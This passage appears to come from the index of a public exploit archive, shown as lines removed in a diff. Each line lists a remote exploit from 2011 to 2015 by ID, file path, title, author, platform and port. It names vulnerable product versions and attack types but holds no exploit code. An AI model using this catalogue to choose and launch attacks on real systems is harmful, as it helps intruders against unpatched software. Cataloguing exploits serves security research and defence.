-35366,exploits/multiple/remote/35366.txt,"IBM Lotus Sametime - stconf.nsf Cross-Site Scripting",2011-02-21,"Dave Daly",multiple,remote, -35386,exploits/linux/remote/35386.txt,"Logwatch Log File - Special Characters Privilege Escalation",2011-02-24,"Dominik George",linux,remote, -35398,exploits/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - '.ksf' Remote Buffer Overflow",2011-02-28,KedAns-Dz,multiple,remote, -35399,exploits/windows/remote/35399.pl,"DivX Player 6.x - '.dps' Remote Buffer Overflow",2011-02-28,KedAns-Dz,windows,remote, -35420,exploits/hardware/remote/35420.txt,"IPUX Cube Type CS303C IP Camera - 'UltraMJCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote, -35421,exploits/hardware/remote/35421.txt,"IPUX CL5452/CL5132 IP Camera - 'UltraSVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote, -35422,exploits/hardware/remote/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - 'UltraHVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote, -35427,exploits/bsd/remote/35427.py,"tnftp (FreeBSD 8/9/10) - 'tnftp' Client Side",2014-12-02,dash,bsd,remote, -35433,exploits/osx/remote/35433.pl,"Apple QuickTime 7.5 - '.m3u' Remote Stack Buffer Overflow",2011-03-09,KedAns-Dz,osx,remote, -35434,exploits/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",windows,remote, -35441,exploits/multiple/remote/35441.rb,"Tincd - Authenticated Remote TCP Stack Buffer Overflow (Metasploit)",2014-12-02,Metasploit,multiple,remote,655 -35446,exploits/windows/remote/35446.pl,"Microsoft Windows Movie Maker 2.1.4026 - '.avi' Remote Buffer Overflow",2011-03-10,KedAns-Dz,windows,remote, -35474,exploits/windows/remote/35474.py,"Microsoft Windows Kerberos - Privilege Escalation (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote, -35464,exploits/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 - URI SecURIty Bypass",2011-03-14,"DcLabs Security Research Group",multiple,remote, -35466,exploits/linux/remote/35466.sh,"nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution",2011-03-05,"RedTeam Pentesting GmbH",linux,remote, -35468,exploits/windows/remote/35468.pl,"Monkey's Audio - '.ape' Remote Buffer Overflow",2011-03-16,KedAns-Dz,windows,remote, -35495,exploits/multiple/remote/35495.txt,"Advantech/BroadWin SCADA Webaccess 7.0 - Multiple Vulnerabilities",2011-03-23,"Ruben Santamarta",multiple,remote, -35501,exploits/multiple/remote/35501.pl,"RealPlayer 11 - '.rmp' Remote Buffer Overflow",2011-03-27,KedAns-Dz,multiple,remote, -35509,exploits/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - '.fp4f' Remote Buffer Overflow",2011-03-27,KedAns-Dz,windows,remote, -35513,exploits/linux/remote/35513.py,"Apache James Server 2.3.2 - Remote Command Execution",2014-12-10,"Jakub Palaczynski",linux,remote,4555 -35560,exploits/windows/remote/35560.txt,"RealNetworks GameHouse 'InstallerDlg.dll' 2.6.0.445 ActiveX Control - Multiple Vulnerabilities",2011-04-03,rgod,windows,remote, -35563,exploits/windows/remote/35563.pl,"EasyPHP 5.3.5.0 - 'index.php' Arbitrary File Download",2011-04-03,KedAns-Dz,windows,remote, -35549,exploits/unix/remote/35549.rb,"ActualAnalyzer - 'ant' Cookie Command Execution (Metasploit)",2014-12-16,Metasploit,unix,remote,80 -35545,exploits/php/remote/35545.rb,"Tuleap - PHP Unserialize Code Execution (Metasploit)",2014-12-15,Metasploit,php,remote,80 -35554,exploits/linux/remote/35554.txt,"Perl 5.x - 'lc()' / 'uc()' TAINT Mode Protection Security Bypass",2011-03-30,mmartinec,linux,remote, -35570,exploits/multiple/remote/35570.txt,"python-feedparser 5.0 - '/feedparser/feedparser.py' Cross-Site Scripting",2011-04-05,fazalmajid,multiple,remote, -35573,exploits/windows/remote/35573.txt,"Microsoft Excel - Remote Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",windows,remote, -35581,exploits/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution (Metasploit)",2014-12-19,"Patrick Webster",linux,remote,6082 -35597,exploits/hardware/remote/35597.txt,"FiberHome HG-110 - Cross-Site Scripting / Directory Traversal",2011-04-08,Zerial,hardware,remote, -35606,exploits/linux/remote/35606.txt,"MIT Kerberos 5 - kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",linux,remote, -35612,exploits/windows/remote/35612.pl,"Winamp 5.6.1 - '.m3u8' Remote Buffer Overflow",2011-04-12,KedAns-Dz,windows,remote, -35614,exploits/windows/remote/35614.c,"EC Software Help & Manual 5.5.1 Build 1296 - 'ijl15.dll' DLL Loading Arbitrary Code Execution",2011-04-14,LiquidWorm,windows,remote, -35620,exploits/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Cross-Site Scripting",2011-04-15,"Edgard Chammas",hardware,remote, -35638,exploits/multiple/remote/35638.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf?jdeowpBackButtonProtect' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote, -35639,exploits/multiple/remote/35639.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService?e1.namespace' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote, -35640,exploits/multiple/remote/35640.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService?e1.namespace' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote, -35641,exploits/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService?RENDER_MAFLET' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote, -35642,exploits/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService?jdemafjasLinkTarget' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote, -35644,exploits/linux/remote/35644.txt,"Viola DVR VIO-4/1000 - Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote, -35652,exploits/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution",2014-12-30,drone,windows,remote, -35660,exploits/php/remote/35660.rb,"ProjectSend - Arbitrary File Upload (Metasploit)",2014-12-31,Metasploit,php,remote,80 -35685,exploits/multiple/remote/35685.txt,"Asterisk 1.8.x - SIP INVITE Request User Enumeration",2011-05-02,"Francesco Tornieri",multiple,remote, -35686,exploits/windows/remote/35686.pl,"OpenMyZip 0.1 - '.zip' Remote Buffer Overflow",2011-05-02,"C4SS!0 G0M3S",windows,remote, -35688,exploits/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",hardware,remote, -35694,exploits/windows/remote/35694.txt,"SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows",2015-01-05,metacom,windows,remote, -35714,exploits/windows/remote/35714.pl,"BlueVoda Website Builder 11 - '.bvp' File Stack Based Buffer Overflow",2011-05-09,KedAns-Dz,windows,remote, -35703,exploits/multiple/remote/35703.py,"sipdroid 2.2 - SIP INVITE Response User Enumeration",2011-05-04,"Anibal Vaz Marques",multiple,remote, -35729,exploits/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,multiple,remote, -35731,exploits/php/remote/35731.rb,"Pandora FMS 3.1 - Authentication Bypass / Arbitrary File Upload (Metasploit)",2015-01-08,Metasploit,php,remote,80 -35735,exploits/multiple/remote/35735.txt,"Apache Struts 2.0.0 < 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting",2011-05-10,"Dr. Marian Ventuneac",multiple,remote, -35740,exploits/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler - Optimization NULL String Remote Code Execution",2011-03-04,"Brian Mancini",windows,remote, -35744,exploits/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 - '.au' File Remote Buffer Overflow",2011-05-16,KedAns-Dz,windows,remote, -35762,exploits/hardware/remote/35762.txt,"Cisco Unified Operations Manager 8.5 - 'iptm/advancedfind.do?extn' Cross-Site Scripting",2011-06-18,"Sense of Security",hardware,remote, -35763,exploits/hardware/remote/35763.txt,"Cisco Unified Operations Manager 8.5 - 'iptm/ddv.do?deviceInstanceName' Cross-Site Scripting",2011-06-18,"Sense of Security",hardware,remote, -35764,exploits/hardware/remote/35764.txt,"Cisco Unified Operations Manager 8.5 - iptm/eventmon Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",hardware,remote, -35765,exploits/hardware/remote/35765.txt,"Cisco Unified Operations Manager 8.5 - '/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp' Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",hardware,remote, -35766,exploits/hardware/remote/35766.txt,"Cisco Unified Operations Manager 8.5 - '/iptm/logicalTopo.do' Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",hardware,remote, -35776,exploits/java/remote/35776.rb,"Lexmark MarkVision Enterprise - Arbitrary File Upload (Metasploit)",2015-01-13,Metasploit,java,remote,9788 -35777,exploits/windows/remote/35777.rb,"Oracle MySQL (Windows) - FILE Privilege Abuse (Metasploit)",2015-01-13,Metasploit,windows,remote, -35778,exploits/php/remote/35778.rb,"WordPress Plugin WP Symposium 14.11 - Arbitrary File Upload (Metasploit)",2015-01-13,Metasploit,php,remote,80 -35779,exploits/hardware/remote/35779.txt,"CiscoWorks Common Services Framework 3.1.1 Help Servlet - Cross-Site Scripting",2011-05-18,"Sense of Security",hardware,remote, -35780,exploits/hardware/remote/35780.txt,"Cisco Unified Operations Manager 8.5 - Common Services Device Center Cross-Site Scripting",2011-05-18,"Sense of Security",hardware,remote, -35784,exploits/linux/remote/35784.php,"Zend Framework 1.11.4 - 'PDO_MySql' Security Bypass",2011-05-19,"Anthony Ferrara",linux,remote, -35785,exploits/linux/remote/35785.txt,"klibc 1.5.2 - DHCP Options Processing Remote Shell Command Execution",2011-05-18,"maximilian attems",linux,remote, -35790,exploits/multiple/remote/35790.py,"Lumension Security Lumension Device Control 4.x - Memory Corruption",2011-05-24,"Andy Davis",multiple,remote, -35792,exploits/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 - File Transfer Cross-Site Scripting",2011-05-24,"Kacper Szczesniak",multiple,remote, -35799,exploits/linux/remote/35799.txt,"Vordel Gateway 6.0.3 - Directory Traversal",2011-05-25,"Brian W. Gary",linux,remote, -35800,exploits/hardware/remote/35800.txt,"RXS-3211 IP Camera - UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",hardware,remote, -35801,exploits/linux/remote/35801.txt,"Asterisk 1.8.4.1 - SIP 'REGISTER' Request User Enumeration",2011-05-26,"Francesco Tornieri",linux,remote, -35805,exploits/multiple/remote/35805.txt,"Gadu-Gadu 10.5 - Remote Code Execution",2011-05-28,"Kacper Szczesniak",multiple,remote, -35806,exploits/windows/remote/35806.c,"Poison Ivy 2.3.2 - Remote Buffer Overflow",2011-05-27,"Kevin R.V",windows,remote, -35809,exploits/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,windows,remote, -35810,exploits/linux/remote/35810.txt,"libxmlInvalid 2.7.x - XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote, -35817,exploits/hardware/remote/35817.txt,"NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote, -35818,exploits/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Cross-Site Scripting",2011-06-01,"Stefan Schurtz",multiple,remote, -35822,exploits/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote, -35836,exploits/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,linux,remote, -35995,exploits/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Unauthenticated Remote DNS Change",2015-02-05,"Todor Donev",hardware,remote, -35997,exploits/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote, -35845,exploits/java/remote/35845.rb,"ManageEngine (Multiple Products) - Authenticated Arbitrary File Upload (Metasploit)",2015-01-20,Metasploit,java,remote,8080 -35855,exploits/php/remote/35855.txt,"PHP 5.3.6 - Security Bypass",2011-06-14,"Krzysztof Kotowicz",php,remote, -35864,exploits/windows/remote/35864.txt,"Sunway ForceControl 6.1 - Multiple Heap Based Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",windows,remote, -35880,exploits/windows/remote/35880.html,"LeadTools Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",windows,remote, -35881,exploits/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.dll' DLL Loading Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",windows,remote, -35885,exploits/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 - 'Initialize()' Method Stack Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote, -35886,exploits/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 - 'ADS' Process Off-by-One Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote, -35887,exploits/hardware/remote/35887.txt,"Cisco Ironport Appliances - Privilege Escalation",2015-01-22,"Glafkos Charalambous",hardware,remote, -35892,exploits/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 - SQL Injection",2011-06-27,"Qihan Luo",multiple,remote, -35897,exploits/windows/remote/35897.html,"CygniCon CyViewer - ActiveX Control 'SaveData()' Insecure Method",2011-06-28,"High-Tech Bridge SA",windows,remote, -35898,exploits/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",multiple,remote, -35917,exploits/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change",2015-01-27,"Todor Donev",hardware,remote, -35918,exploits/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",multiple,remote, -35919,exploits/bsd/remote/35919.c,"NetBSD 5.1 - 'libc/net' Multiple Stack Buffer Overflows",2011-07-01,"Maksymilian Arciemowicz",bsd,remote, -35921,exploits/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,windows,remote, -35924,exploits/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass",2015-01-28,"Jeremy Brown",windows,remote, -35925,exploits/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote, -35928,exploits/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 - ActiveX 'SaveToFile()' Arbitrary File Overwrite",2011-07-06,"High-Tech Bridge SA",windows,remote, -35932,exploits/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Overflow",2015-01-29,"Nicholas Lemonias",hardware,remote, -35948,exploits/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - ASLR + DEP Bypass",2015-01-30,Rh0,windows,remote, -35949,exploits/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",windows,remote, -35961,exploits/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",hp-ux,remote, -35970,exploits/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ - Cross-Site Request Forgery / HTML Injection",2011-07-18,MustLive,hardware,remote, -36004,exploits/multiple/remote/36004.txt,"Skype 5.3 - 'Mobile Phone' HTML Injection",2011-08-01,noptrix,multiple,remote, -36006,exploits/multiple/remote/36006.java,"Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass",2011-08-02,"Roee Hay",multiple,remote, -36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,multiple,remote, -36014,exploits/hardware/remote/36014.pl,"LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure",2015-02-07,"Todor Donev",hardware,remote, -36016,exploits/multiple/remote/36016.txt,"Xpdf 3.02-13 - 'zxpdf' Security Bypass",2011-08-04,"Chung-chieh Shan",multiple,remote, -36020,exploits/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote, -36045,exploits/cgi/remote/36045.txt,"SurgeFTP 23b6 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",cgi,remote, -36049,exploits/windows/remote/36049.html,"StudioLine Photo Basic 3.70.34.0 - 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite",2011-08-17,"High-Tech Bridge SA",windows,remote, -36056,exploits/windows/remote/36056.rb,"Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)",2015-02-11,Metasploit,windows,remote,9256 -36075,exploits/windows/remote/36075.py,"Freefloat FTP Server - 'ALLO' Remote Buffer Overflow",2011-08-20,Black.Spook,windows,remote, -36078,exploits/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow",2015-02-14,R-73eN,windows,remote, -36100,exploits/windows/remote/36100.rb,"X360 VideoPlayer - ActiveX Control Buffer Overflow (Metasploit)",2015-02-17,Metasploit,windows,remote, -36101,exploits/java/remote/36101.rb,"Java JMX - Server Insecure Configuration Java Code Execution (Metasploit)",2015-02-17,Metasploit,java,remote,1617 -36111,exploits/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 - Remote Buffer Overflow",2011-09-05,KedAns-Dz,windows,remote, -36115,exploits/windows/remote/36115.txt,"Apple QuickTime 7.6.9 - 'QuickTimePlayer.dll' ActiveX Buffer Overflow",2011-09-06,"Ivan Sanchez",windows,remote, -36124,exploits/php/remote/36124.txt,"jQuery - jui_filter_rules PHP Code Execution",2015-02-19,"Timo Schmid",php,remote,80 -36130,exploits/multiple/remote/36130.txt,"Spring Security - HTTP Header Injection",2011-09-09,"David Mas",multiple,remote, -36145,exploits/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Remote Stack Buffer Overflow",2011-09-20,rmallof,windows,remote, -36169,exploits/multiple/remote/36169.rb,"HP Client - Automation Command Injection (Metasploit)",2015-02-24,Metasploit,multiple,remote,3465 -36174,exploits/windows/remote/36174.txt,"ServersCheck Monitoring Software 8.8.x - Multiple Vulnerabilities",2011-09-27,Vulnerability-Lab,windows,remote, -36199,exploits/linux/remote/36199.txt,"Perl 5.x - Digest Module 'Digest->new()' Code Injection",2011-10-02,anonymous,linux,remote, -36205,exploits/hardware/remote/36205.txt,"SonicWALL - SessId Cookie Brute Force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote, -36206,exploits/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)",2015-02-27,"Ben Turner",windows,remote,3465 -36209,exploits/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",windows,remote, -36263,exploits/linux/remote/36263.rb,"Symantec Web Gateway 5 - 'restore.php' Authenticated Command Injection (Metasploit)",2015-03-04,Metasploit,linux,remote,443 -36217,exploits/windows/remote/36217.txt,"GoAhead Web Server 2.18 - 'addgroup.asp?group' Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote, -36218,exploits/windows/remote/36218.txt,"GoAhead Web Server 2.18 - 'addlimit.asp?url' Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote, -36219,exploits/windows/remote/36219.txt,"GoAhead Web Server 2.18 - 'adduser.asp' Multiple Cross-Site Scripting Vulnerabilities",2011-10-10,"Silent Dream",windows,remote, -36235,exploits/windows/remote/36235.txt,"PROMOTIC 8.1.3 - Multiple Vulnerabilities",2011-10-14,"Luigi Auriemma",windows,remote, -36238,exploits/multiple/remote/36238.txt,"Toshiba e-Studio (Multiple Devices) - Security Bypass",2011-10-17,"Deral Heiland PercX",multiple,remote, -36239,exploits/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 - Multiple Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote, -36246,exploits/multiple/remote/36246.txt,"Splunk 4.1.6 - 'segment' Cross-Site Scripting",2011-10-20,"Filip Palian",multiple,remote, -36250,exploits/windows/remote/36250.html,"Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method",2011-10-24,rgod,windows,remote, -36256,exploits/hardware/remote/36256.txt,"Cisco - 'file' Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote, -36258,exploits/windows/remote/36258.txt,"XAMPP 1.7.4 - Cross-Site Scripting",2011-10-26,Sangteamtham,windows,remote, -36264,exploits/php/remote/36264.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)",2015-03-04,Metasploit,php,remote,80 -36291,exploits/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Multiple Cross-Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote, -36304,exploits/windows/remote/36304.rb,"HP Data Protector 8.10 - Remote Command Execution (Metasploit)",2015-03-06,Metasploit,windows,remote,5555 -36318,exploits/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote, -36319,exploits/windows/remote/36319.txt,"GoAhead Web Server 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote, -36337,exploits/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200 -36352,exploits/linux/remote/36352.txt,"Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote, -36360,exploits/windows/remote/36360.rb,"Adobe Flash Player - ByteArray UncompressViaZlibVariant Use-After-Free (Metasploit)",2015-03-12,Metasploit,windows,remote, -36370,exploits/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload / Code Execution",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote, -36376,exploits/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,windows,remote, -36412,exploits/windows/remote/36412.rb,"IPass Control Pipe - Remote Command Execution (Metasploit)",2015-03-16,Metasploit,windows,remote, -36415,exploits/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass (Metasploit)",2015-03-16,Metasploit,java,remote,9200 -36420,exploits/windows/remote/36420.rb,"Adobe Flash Player - PCRE Regex (Metasploit)",2015-03-17,Metasploit,windows,remote, -36421,exploits/linux/remote/36421.rb,"Exim GHOST - glibc gethostbyname Buffer Overflow (Metasploit)",2015-03-18,"Qualys Corporation",linux,remote,25 -36480,exploits/multiple/remote/36480.rb,"Mozilla Firefox - Proxy Prototype Privileged JavaScript Injection (Metasploit)",2015-03-24,Metasploit,multiple,remote, -36426,exploits/multiple/remote/36426.txt,"Apache Struts 2.0.9/2.1.8 - Session Tampering Security Bypass",2011-12-07,"Hisato Killing",multiple,remote, -36428,exploits/hardware/remote/36428.txt,"Axis M10 Series Network Cameras - Cross-Site Scripting",2011-12-07,"Matt Metzger",hardware,remote, -36429,exploits/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 - Web Interface Log Viewer Page URI Cross-Site Scripting",2011-12-08,"Silent Dream",hardware,remote, -36438,exploits/php/remote/36438.rb,"TWiki Debugenableplugins - Remote Code Execution (Metasploit)",2015-03-19,Metasploit,php,remote,80 -36455,exploits/multiple/remote/36455.txt,"Nagios XI - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-12-14,anonymous,multiple,remote, -36475,exploits/hardware/remote/36475.txt,"Barracuda Control Center 620 - Cross-Site Scripting / HTML Injection",2011-12-21,Vulnerability-Lab,hardware,remote, -36477,exploits/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Universal",2015-03-24,"Fady Mohammed Osman",windows,remote, -36491,exploits/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote, -36500,exploits/windows/remote/36500.txt,"HServer 0.1.1 - Directory Traversal",2012-01-05,demonalex,windows,remote, -36503,exploits/hardware/remote/36503.rb,"QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",hardware,remote,9993 -36504,exploits/hardware/remote/36504.rb,"QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",hardware,remote, -36505,exploits/windows/remote/36505.txt,"WebGate eDVR Manager - Remote Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote, -36507,exploits/windows/remote/36507.txt,"Microsoft AntiXSS 3/4.0 Library Sanitization Module - Security Bypass",2012-01-10,"Adi Cohen",windows,remote, -36511,exploits/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",hardware,remote, -36513,exploits/windows/remote/36513.txt,"IpTools 0.1.4 - Tiny TCP/IP servers Directory Traversal",2012-01-06,demonalex,windows,remote, -36514,exploits/windows/remote/36514.pl,"IPtools 0.1.4 - Remote Command Server Buffer Overflow",2012-01-06,demonalex,windows,remote, -36516,exploits/windows/remote/36516.py,"Acunetix 9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote, -36517,exploits/windows/remote/36517.html,"WebGate WinRDS 2.0.8 - StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote, -36518,exploits/windows/remote/36518.html,"WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote, -36519,exploits/windows/remote/36519.html,"WebGate eDVR Manager 2.6.4 - SiteName Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote, -36537,exploits/multiple/remote/36537.txt,"SonicWALL AntiSpam & EMail 7.3.1 - Multiple Vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",multiple,remote, -36542,exploits/windows/remote/36542.txt,"ExpressView Browser Plugin 6.5.0.3330 - Multiple Integer Overflow / Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote, -36546,exploits/windows/remote/36546.txt,"GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double-Free Remote Memory Corruption",2012-01-12,NCNIPC,windows,remote, -36562,exploits/linux/remote/36562.txt,"Apache Spark Cluster 1.3.x - Arbitrary Code Execution",2015-03-30,"Akhil Das",linux,remote, -36577,exploits/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote, -36579,exploits/windows/remote/36579.rb,"Adobe Flash Player - ByteArray With Workers Use-After-Free (Metasploit)",2015-03-31,Metasploit,windows,remote, -36587,exploits/windows/remote/36587.py,"Savant Web Server 3.1 - Remote Buffer Overflow (4)",2012-01-21,red-dragon,windows,remote, -36602,exploits/windows/remote/36602.html,"WebGate WESP SDK 1.2 - ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote, -36603,exploits/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 - AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote, -36604,exploits/windows/remote/36604.html,"WebGate WinRDS 2.0.8 - PlaySiteAllChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote, -36606,exploits/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 - SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote, -36607,exploits/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote, -36652,exploits/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)",2015-04-06,"Jay Turla",multiple,remote,6667 -36653,exploits/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload / Execution (Metasploit)",2015-04-06,Metasploit,jsp,remote,8080 -36663,exploits/linux/remote/36663.txt,"Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote, -36670,exploits/hardware/remote/36670.txt,"D-Link ShareCenter Products - Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote, -36679,exploits/windows/remote/36679.rb,"SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling (Metasploit)",2015-04-08,Metasploit,windows,remote, 